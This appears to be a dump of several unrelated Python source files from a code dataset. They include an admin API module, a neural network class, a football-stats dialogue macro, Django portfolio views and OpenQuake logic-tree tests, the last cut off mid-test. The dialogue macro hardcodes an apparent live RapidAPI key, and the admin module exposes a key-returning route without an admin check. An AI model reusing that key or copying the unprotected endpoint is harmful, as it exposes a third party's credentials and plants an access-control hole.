import AlphaException\n\nfrom core import core\n\napi = core.api\ndb = core.db\nlog = core.get_logger(\"api\")\n\n\n@route(\"/admin/key\", parameters=[Parameter(\"key\")], methods=[\"POST\"])\ndef get_key():\n return secure_lib.magic_code(api[\"key\"])\n\n\n@route(\"/admin/logs/clear\", methods=[\"GET\"], admin=True, parameters=[])\ndef clear_logs():\n done = logs_lib.clear_logs(api)\n if not done:\n raise AlphaException(\"database\")\n\n\n@route(\n \"/admin/logs\",\n methods=[\"POST\", \"GET\"],\n admin=True,\n parameters=[\n Parameter(\"page\", required=True, ptype=int),\n Parameter(\"startDate\", required=True),\n Parameter(\"endDate\", required=True),\n ],\n)\ndef admin_logs():\n page = int(api[\"page\"])\n limit = page != 0\n return logs_lib.get_logs(\n start_date=api[\"startDate\"],\n end_date=api[\"endDate\"],\n useLimit=limit,\n pageForLimit=page,\n )\n\n\n@route(\"/admin/process\")\ndef get_process():\n import psutil\n\n output = {}\n # Iterate over all running process\n i = 0\n for proc in psutil.process_iter():\n if i > 10:\n break\n try:\n # Get process name & pid from process object.\n processName = proc.name()\n processID = proc.pid\n if proc.memory_percent() > 0.01:\n print(processName, \" ::: \", processID)\n output[processName] = proc.as_dict()\n i += 1\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n pass\n return output\n","repo_name":"Tanguybes/alphaz","sub_path":"apis/routes/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38022189012","text":"import torch.nn as nn\n\n\nclass NeuralNet(nn.Module): # defines deep feedforward neural nets\n def __init__(self, input_size, hidden_size=200, num_hidden_layers=2, output_size=3, activation='relu'):\n super(NeuralNet, self).__init__()\n act_fun = get_activation(activation)\n self.input_size = input_size\n self.first_hidden_layer = nn.Sequential(nn.Linear(input_size, hidden_size), act_fun)\n self.out_layer = nn.Linear(hidden_size, output_size)\n\n self.hidden_layers = [self.first_hidden_layer]\n for _ in range(num_hidden_layers - 1):\n layer = nn.Sequential(nn.Linear(hidden_size, hidden_size), act_fun)\n self.hidden_layers.append(layer)\n\n if num_hidden_layers != 0:\n self.hidden_layers = nn.ModuleList(self.hidden_layers)\n else:\n self.out_layer = nn.Linear(input_size, output_size)\n self.hidden_layers = []\n\n def forward(self, x):\n for layer in self.hidden_layers:\n x = layer(x)\n\n x = self.out_layer(x)\n return x\n\n\ndef get_activation(activation):\n if activation == \"relu\":\n return nn.ReLU()\n elif activation == \"tanh\":\n return nn.Tanh()\n elif activation == \"sigmoid\":\n return nn.Sigmoid()\n else:\n raise RuntimeError(\"activation should be relu/tanh/sigmoid, not %s.\" % activation)\n\n","repo_name":"yyxhdy/tdeadp","sub_path":"learning/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"16207128288","text":"import requests\n\nfrom enum import Enum\nfrom emora_stdm import DialogueFlow\nfrom emora_stdm import Macro, Ngrams\nfrom typing import Dict, Any, List\nimport openai\nfrom typing import Dict, Any, List\nimport re\nimport os\n\n\nclass MacroGetMatchStat(Macro):\n def run(self, ngrams: Ngrams, vars: Dict[str, Any], args: List[Any]):\n team_mentioned = []\n team1, team2 = None, None\n\n\n team_names= [\"Arsenal\", \"Aston Villa\", \"Blackburn Rovers\", \"Chelsea\", \"Coventry City\", \"Crystal Palace\", \"Everton\",\n \"Ipswich Town\", \"Leeds United\",\n \"Liverpool\", \"Manchester City\", \"Manchester United\", \"Middlesbrough\", \"Norwich City\",\n \"Nottingham Forest\",\n \"Oldham Athletic\", \"Queens Park Rangers\",\n \"Sheffield United\", \"Sheffield Wednesday\", \"Southampton\", \"Tottenham Hotspur\", \"Wimbledon\"]\n\n for team in team_names:\n if team in ngrams.raw_text():\n team_mentioned.append(team)\n\n\n\n team1 = team_mentioned[0]\n team2 = team_mentioned[1]\n# possibly remove everything below\n url = \"https://heisenbug-premier-league-live-scores-v1.p.rapidapi.com/api/premierleague/match/events\"\n\n querystring = {\"team1\": team1, \"team2\": team2}\n\n headers = {\n \"X-RapidAPI-Key\": \"73c83052efmshaa867d4a4f50068p1dde59jsn4703d6c45a54\",\n \"X-RapidAPI-Host\": \"heisenbug-premier-league-live-scores-v1.p.rapidapi.com\"\n }\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n vars['RESPONSE'] = response.text\n print(response.text)\n\n\n\ntransitions = {\n 'state': 'start',\n '`What do you want to talk about?`': {\n '#GET_Match_Stat':{\n '`$RESPONSE`':'end'\n }\n\n }\n}\n\n\nmacros = {\n 'GET_Match_Stat': MacroGetMatchStat()\n }\n\ndf = DialogueFlow('start', end_state='end')\ndf.load_transitions(transitions)\ndf.add_macros(macros)\n\nif __name__ == '__main__':\n df.run()\n\n\n\n\n\n\n\n\n","repo_name":"havzor1231/deployer","sub_path":"Macro#GET_Match_Stat.py","file_name":"Macro#GET_Match_Stat.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42853614620","text":"from data_access.post_processing_repositories import *\nfrom data_access.timewise_repositories import *\nfrom gui.data_plotting.post_processing_data_plot import *\nfrom filter_testing.filter_testing_database import *\nfrom filter_testing.filter_testing_frame import *\nfrom filter_testing.filter_testing_plot import *\nfrom filter_testing.filter_testing_panel_controller import *\nfrom filter_testing.unfiltered_repositories import *\nfrom data.post_processing_database import *\n\n\nclass FilterTestingController(object):\n def __init__(self):\n self.DERIVATIVE_INTERVAL = 100\n self.FILTER_ORDER = 1\n self.FILTER_WINDOW = 111\n self.time, self.positions = np.loadtxt(\n \"/Users/MacBook/Dropbox/SupermileageBench/2012-11-27 15:23:05/RealTime.csv\", skiprows=1, usecols=(0, 1),\n delimiter=',', unpack=True)\n self.database = FilterTestingDatabase(self.time, self.positions, derivative_interval=self.DERIVATIVE_INTERVAL,\n filter_order=self.FILTER_ORDER, filter_window=self.FILTER_WINDOW)\n\n # outfile = open('data.pkl', 'wb')\n # pickle.dump(zip(tuple(time.tolist()), tuple(positions.tolist())), outfile)\n # outfile.close()\n\n\n self.post_processing_database = PostProcessingDatabase(self.database)\n self.subplots = self._init_post_treatment_subplots()\n\n self.filter_testing_controller = FilterTestingPanelController(self.subplots, self)\n self.frame = FilterTestingFrame()\n self.filter_testing_controller.create_panel(self.frame)\n\n self.frame.Show(True)\n self.frame.Centre()\n\n def _init_post_treatment_subplots(self):\n subplots = []\n\n velocity_repository = SpeedRadiansTimewiseRepository(self.database)\n acceleration_repository = AccelerationTimewiseRepository(self.database)\n\n unfiltered_velocity_repository = UnfilteredVelocityRepository(self.database)\n unfiltered_acceleration_repository = UnfilteredAccelerationRepository(self.database)\n\n torque_repository = TorquePostProcessingRepository(self.post_processing_database)\n power_repository = PowerPostProcessingRepository(self.post_processing_database)\n\n\n #Add subplots here\n velocityPlot = FilterTestingPlot(unfiltered_velocity_repository, velocity_repository, subplot_code=(221),\n title='Velocity')\n accelerationPlot = FilterTestingPlot(unfiltered_acceleration_repository, acceleration_repository,\n subplot_code=(223), title='Acceleration')\n\n torquePlot = PostProcessingDataPlot(torque_repository, subplot_code=(224), title='Torque')\n powerPlot = PostProcessingDataPlot(power_repository, subplot_code=(222), title='Power')\n\n subplots.append(velocityPlot)\n subplots.append(accelerationPlot)\n subplots.append(torquePlot)\n subplots.append(powerPlot)\n return subplots\n\n def OnDerivativeIntervalScroll(self, value):\n self.DERIVATIVE_INTERVAL = value\n self._redraw_plots()\n\n def OnFilterOrderScroll(self, value):\n self.FILTER_ORDER = value\n self._redraw_plots()\n\n def OnFilterWindowScroll(self, value):\n if value % 2 == 0:\n value += 1\n\n self.FILTER_WINDOW = value\n self._redraw_plots()\n\n def calculate_new_filter(self, derivative_interval, filter_order, filter_window):\n self._redraw_plots(derivative_interval, filter_order, filter_window)\n\n def _redraw_plots(self, derivative_interval, filter_order, filter_window):\n fw = filter_window\n if filter_window % 2 == 0:\n fw += 1\n\n self.DERIVATIVE_INTERVAL = derivative_interval\n self.FILTER_ORDER = filter_order\n self.FILTER_WINDOW = fw\n\n self.database.reset_time_and_positions(self.time, self.positions, derivative_interval=self.DERIVATIVE_INTERVAL,\n filter_order=self.FILTER_ORDER, filter_window=self.FILTER_WINDOW)\n self.filter_testing_controller.redraw_plots()","repo_name":"pobed2/SupermileageBench","sub_path":"filter_testing_app/filter_testing_controller.py","file_name":"filter_testing_controller.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35298528898","text":"# 1. Two Sum\n\nclass Solution:\n def twoSum(self, nums: list[int], target: int) -> list[int]:\n minus = dict()\n\n for i in range(len(nums)):\n if( (target - nums[i]) in minus):\n return [i, minus[target-nums[i]]]\n else:\n minus[nums[i]] = i","repo_name":"canhotuctor/prog","sub_path":"LeetCode/L1_TwoSum.py","file_name":"L1_TwoSum.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41715919398","text":"from django.shortcuts import render\nfrom django.views.generic import ListView, DetailView\nfrom .models import Carteira, Vendas\nfrom django.views.generic import TemplateView\nimport requests\nimport finnhub\nfrom .key_api import *\n\n\ndef home(request):\n context ={\n 'title':'Seja Bem vindo',\n 'form':'meu grande amigo',\n }\n return render(request, 'home.html',context)\n\n\ndef lista_acao(request):\n queryset = Carteira.objects.all()\n total_carteira = soma_da_carteira(queryset)\n queryset, lucro_da_carteira = tratamento(queryset)\n context = {\n 'queryset':queryset,\n 'total_carteira':total_carteira,\n 'dolar':get_dolar_price(),\n 'lucro_da_carteira':f'{lucro_da_carteira:.2f}',\n }\n return render(request, 'list_items.html', context)\n\ndef tratamento(lista_de_acao):\n lista = []\n lucro_da_carteira = float(0)\n for acao in lista_de_acao:\n preco_acao = 0\n if acao.dolarizado == False:\n if acao.papel == 'caixa':\n preco_acao = 1\n else:\n preco_acao = scraping(acao)\n if acao.dolarizado == True:\n if acao.papel == 'caixa':\n preco_acao = 1\n else:\n preco_acao = scraping_exterior(acao)\n lucro = (float(acao.quantidade)*float(preco_acao) - (float(acao.quantidade) * float(acao.preco_medio)))\n if acao.dolarizado == True:\n dicionario_retorno = tratamento_dicionario('$', acao.mes_carteira, acao.papel, acao.quantidade, preco_acao, acao.preco_medio, acao.dolarizado, lucro)\n if acao.dolarizado == False:\n dicionario_retorno = tratamento_dicionario('R$', acao.mes_carteira, acao.papel, acao.quantidade, preco_acao, acao.preco_medio, acao.dolarizado, lucro)\n if dicionario_retorno['dolarizado'] == True:\n dolar = get_dolar_price()\n lucro_da_carteira += float(dicionario_retorno['lucro'][2:])*dolar\n else:\n lucro_da_carteira += float(dicionario_retorno['lucro'][3:])\n lista.append(dicionario_retorno)\n return lista, lucro_da_carteira\n\ndef scraping(acao):\n acao = str(acao)\n if acao == 'movi3':\n return float(16.37)\n endpoint = f'https://secure-wildwood-34847.herokuapp.com/br/{acao}'\n resposta = requests.request('GET', endpoint)\n resposta_da_acao = resposta.json()\n return float(resposta_da_acao[f'{acao}']['fundamentalist_analysis']['adj_close'])\n\ndef scraping_exterior(acao):\n acao = str(acao)\n if acao == 'ads':\n return float(45.32)\n endpoint = f'https://secure-wildwood-34847.herokuapp.com/usa/{acao}'\n resposta = requests.request('GET', endpoint)\n resposta_da_acao = resposta.json()\n return float(resposta_da_acao[f'{acao}']['fundamentalist_analysis']['adj_close'])\n\n\ndef soma_da_carteira(queryset):\n total_carteira = float(0)\n dolar = get_dolar_price()\n for acao in queryset:\n if acao.papel == 'caixa':\n if acao.dolarizado == False:\n total_carteira += float(acao.quantidade)*float(acao.preco_medio)\n else:\n total_carteira += (float(acao.quantidade)*float(acao.preco_medio))* dolar\n else:\n if acao.dolarizado == True:\n total_carteira += float(acao.quantidade)*float(scraping_exterior(acao))* dolar\n else:\n total_carteira += float(acao.quantidade)*float(scraping(acao))\n return total_carteira\n\ndef get_dolar_price():\n endpoint = 'https://economia.awesomeapi.com.br/json/all/USD-BRL'\n resposta = requests.request('GET', endpoint)\n return float(resposta.json()['USD']['ask'])\n\ndef tratamento_dicionario(moeda, mes_carteira, papel, quantidade, cotacao_atual, preco_medio, dolarizado, lucro):\n return {\n 'mes_carteira':mes_carteira,\n 'papel':f' {papel}',\n 'quantidade':quantidade,\n 'cotacao_atual':f' {moeda}{float(cotacao_atual):.2f}',\n 'preco_medio':f' {moeda}{preco_medio:.2f}',\n 'dolarizado': dolarizado,\n 'lucro':f' {moeda}{lucro:.2f}'\n }\n\n\ndef lista_acao_vendas(request):\n queryset_vendas = Vendas.objects.all()\n context = {\n 'queryset_vendas':'dicionario_venda',\n }\n return render(request, 'list_items_vendas.html', context)\n","repo_name":"ribeirosaimon/python_for_finance","sub_path":"carteira/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5108489571","text":"import os\nimport codecs\nimport unittest\nimport collections\n\nimport numpy\nfrom xml.parsers.expat import ExpatError\nfrom xml.etree import ElementTree as ET\nfrom copy import deepcopy\n\nfrom io import BytesIO\nfrom decimal import Decimal\nfrom mock import Mock\n\nimport openquake.hazardlib\nfrom openquake.hazardlib import geo\nfrom openquake.baselib.general import gettemp\nfrom openquake.hazardlib import valid\nfrom openquake.commonlib import logictree, readinput, tests, source\nfrom openquake.hazardlib.tom import PoissonTOM\nfrom openquake.hazardlib.pmf import PMF\nfrom openquake.hazardlib.mfd import TruncatedGRMFD, EvenlyDiscretizedMFD\n\nDATADIR = os.path.join(os.path.dirname(__file__), 'data')\n\n\nclass StringIO(BytesIO):\n def __repr__(self):\n return ''\n\n\nclass _TestableSourceModelLogicTree(logictree.SourceModelLogicTree):\n def __init__(self, filename, files, basepath, validate=True):\n self.files = files\n if not validate:\n self.validate_branchset = self.__fail\n self.validate_tree = self.__fail\n self.validate_filters = self.__fail\n self.validate_uncertainty_value = self.__fail\n f = gettemp(files[filename], suffix='.' + filename)\n super().__init__(f, validate)\n\n def _get_source_model(self, filename):\n return StringIO(self.files[filename].encode('utf-8'))\n\n def __fail(self, *args, **kwargs):\n raise AssertionError(\"this method shouldn't be called\")\n\n\ndef _make_nrml(content):\n return (\"\"\"\n \\\n %s\n \"\"\" % content)\n\n\ndef _whatever_sourcemodel():\n return _make_nrml(\"\"\"\\\n \n \n \n \n \n -121.82290 37.73010 0.0\n -122.03880 37.87710 0.0\n \n \n 38\n 8.0\n 13.0\n \n WC1994\n 1.5\n \n 90.0\n \n\n \n \n \n \n -121.82290 37.73010 0.0\n -122.03880 37.87710 0.0\n \n \n 38\n 8.0\n 13.0\n \n WC1994\n 1.5\n \n 90.0\n \n\n \n \n \n -122.0 38.0\n \n 0.0\n 10.0\n \n WC1994\n 0.5\n \n \n \n \n \n \n \n \n \n \n \n \"\"\")\n\n\ndef _whatever_sourcemodel_lt(sourcemodel_filename):\n return _make_nrml(\"\"\"\\\n \n \n \n \n %s\n 1.0\n \n \n \n \n \"\"\" % sourcemodel_filename)\n\n\nclass SourceModelLogicTreeBrokenInputTestCase(unittest.TestCase):\n def _assert_logic_tree_error(self, filename, files, basepath,\n exc_class=logictree.LogicTreeError,\n exc_filename=None):\n with self.assertRaises(exc_class) as arc:\n _TestableSourceModelLogicTree(filename, files, basepath)\n exc = arc.exception\n if '.' in exc.filename:\n suffix = exc.filename.rsplit('.')[1]\n self.assertEqual(suffix, exc_filename or filename)\n return exc\n\n def test_logictree_invalid_xml(self):\n self._assert_logic_tree_error(\n 'broken_xml', {'broken_xml': \"\n \n \n \"\"\")\n exc = self._assert_logic_tree_error(\n 'screwed_schema', {'screwed_schema': source}, 'base',\n logictree.ValidationError)\n self.assertIn('missing logicTree node', exc.message)\n\n def test_wrong_uncert_type_on_first_branching_level(self):\n source = _make_nrml(\"\"\"\\\n \n \n \n \n +100\n 1.0\n \n \n \n \n \"\"\")\n exc = self._assert_logic_tree_error(\n 'logictree', {'logictree': source}, 'base',\n logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 4)\n error = 'first branchset must define an uncertainty ' \\\n 'of type \"sourceModel\"'\n self.assertTrue(error in str(exc),\n \"wrong exception message: %s\" % exc)\n\n def test_source_model_uncert_on_wrong_level(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 1.0\n \n \n \n \n \n \n sm2\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error(\n 'lt', {'lt': lt, 'sm1': sm, 'sm2': sm}, 'base',\n logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 13)\n error = 'uncertainty of type \"sourceModel\" can be defined ' \\\n 'on first branchset only'\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_two_branchsets_on_first_level(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 1.0\n \n \n \n \n sm2\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error(\n 'lt', {'lt': lt, 'sm1': sm, 'sm2': sm}, 'base',\n logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 11)\n error = 'there must be only one branch set on first branching level'\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_branch_id_not_unique(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 0.7\n \n \n sm2\n 0.4\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error(\n 'lt', {'lt': lt, 'sm1': sm, 'sm2': sm}, '/bz',\n logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 10)\n self.assertEqual(exc.message, \"branchID 'b1' is not unique\",\n \"wrong exception message: %s\" % exc.message)\n\n def test_branches_weight_wrong_sum(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 0.7\n \n \n sm2\n 0.4\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error(\n 'lo', {'lo': lt, 'sm1': sm, 'sm2': sm}, 'base',\n logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 4)\n self.assertEqual(exc.message, \"branchset weights don't sum up to 1.0\",\n \"wrong exception message: %s\" % exc.message)\n\n def test_apply_to_nonexistent_branch(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n self.assertEqual(exc.message, \"branch 'mssng' is not yet defined\",\n \"wrong exception message: %s\" % exc.message)\n\n def test_apply_to_occupied_branch(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 1.0\n \n \n \n \n 123\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 21)\n error = \"branch 'b1' already has child branchset\"\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_ab_gr_absolute_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123.45\n 1.0\n \n \n \n \n \"\"\")\n\n sm = _whatever_sourcemodel()\n\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm},\n 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 17)\n error = \"expected a pair of floats separated by space\"\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_b_gr_relative_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123.45z\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 16)\n self.assertEqual(exc.message, 'expected single float value',\n \"wrong exception message: %s\" % exc.message)\n\n def test_incremental_mfd_absolute_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n -0.01 0.005\n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n with self.assertRaises(ValueError) as arc:\n _TestableSourceModelLogicTree('lt', {'lt': lt, 'sm': sm}, 'base')\n self.assertIn(\n \"Could not convert occurRates->positivefloats: \"\n \"float -0.01 < 0, line 18\", str(arc.exception))\n\n def test_simple_fault_geometry_absolute_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n \n \n -121.8229 wrong -122.0388 37.8771\n \n \n \n 45.0\n \n \n 10.0\n \n \n 20.0\n \n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n ValueError)\n self.assertIn(\"Found a non-float in -121.8229 wrong \"\n \"-122.0388 37.8771: 'wrong' is not a float\",\n str(exc))\n\n def test_complex_fault_geometry_absolute_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n \n \n \n 0.0 0.0 0.0 1.0 0.0 0.0\n \n \n \n \n \n \n 0.0 -0.1 0.0 1.0 wrong 0.0\n \n \n \n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n ValueError)\n self.assertIn('Could not convert posList->posList: Found a non-float ',\n str(exc))\n\n def test_characteristic_fault_planar_geometry_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n ValueError)\n self.assertIn('Could not convert lat->latitude', str(exc))\n\n def test_characteristic_fault_simple_geometry_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n \n \n \n -121.8229 wrong -122.0388 37.8771\n \n \n \n 45.0\n \n \n 10.0\n \n \n 20.0\n \n \n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n ValueError)\n self.assertIn('Could not convert posList->posList: Found a non-float',\n str(exc))\n\n def test_characteristic_fault_complex_geometry_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n \n \n \n \n 0.0 0.0 0.0 1.0 0.0 0.0\n \n \n \n \n \n \n 0.0 -0.1 0.0 1.0 wrong 0.0\n \n \n \n \n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n ValueError)\n self.assertIn('Could not convert posList->posList: Found a non-float',\n str(exc))\n\n def test_characteristic_fault_invalid_geometry(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n XXX\n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(\n exc.message,\n \"Surface geometry type not recognised\",\n \"wrong exception message: %s\" % exc.message)\n\n def test_source_model_invalid_xml(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \"\"\")\n sm = \"\"\"ololo\"\"\"\n\n self._assert_logic_tree_error(\n 'sm', {'lt': lt, 'sm': sm}, 'base',\n ExpatError, exc_filename='sm')\n\n def test_source_model_schema_violation(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \"\"\")\n sm = _make_nrml(\"\"\"\\\n \n \n \n Mount Diablo Thrust\n Swamps, lots of them\n 90.0\n 0.0010614989 8.8291627E-4 7.3437777E-4\n 6.108288E-4 5.080653E-4\n \n \n \n \n \n -121.82290 37.73010 0.0\n -122.03880 37.87710 0.0\n \n \n \n 38\n 8.0\n 13.0\n \n \n \n \"\"\")\n error = self._assert_logic_tree_error(\n 'lt', {'lt': lt, 'sm': sm}, '/x',\n logictree.ValidationError, exc_filename='lt')\n self.assertIn(\"node config\", str(error.message))\n\n def test_referencing_over_level_boundaries(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 0.5\n \n \n sm2\n 0.5\n \n \n \n \n \n \n 1 2\n 1.0\n \n \n \n \n \n \n 1 2\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error(\n 'lt', {'lt': lt, 'sm1': sm, 'sm2': sm}, 'base',\n logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 27)\n error = 'applyToBranches must reference only branches ' \\\n 'from previous branching level'\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_gmpe_uncertainty(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n CL_2002_AttenRel\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n error = 'uncertainty of type \"gmpeModel\" is not allowed ' \\\n 'in source model logic tree'\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_filters_on_first_branching_level(self):\n filters = ('applyToSources=\"src01\"',\n 'applyToTectonicRegionType=\"Active Shallow Crust\"',\n 'applyToSourceType=\"point\"')\n for filter_ in filters:\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \"\"\" % filter_)\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error(\n 'lt', {'lt': lt, 'sm': sm}, 'base', logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 4)\n error = 'filters are not allowed on source model uncertainty'\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_referencing_nonexistent_source(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n error = \"source with id 'bzzz' is not defined in source models\"\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_referencing_nonexistent_tectonic_region_type(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n error = \"source models don't define sources of \" \\\n \"tectonic region type 'Volcanic'\"\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_referencing_nonexistent_source_type(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n error = \"source models don't define sources of type 'complexFault'\"\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_more_than_one_filters_on_one_branchset(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n error = 'only one filter is allowed per branchset'\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_wrong_filter_on_absolute_uncertainties(self):\n uncertainties_and_values = [('abGRAbsolute', '123 45'),\n ('maxMagGRAbsolute', '678')]\n filters = ('applyToSources=\"src01 src02\"',\n 'applyToTectonicRegionType=\"Active Shallow Crust\"',\n 'applyToSourceType=\"simpleFault\"')\n for uncertainty, value in uncertainties_and_values:\n for filter_ in filters:\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n %s\n 1.0\n \n \n \n \n \"\"\" % (uncertainty, filter_, value))\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm},\n 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n 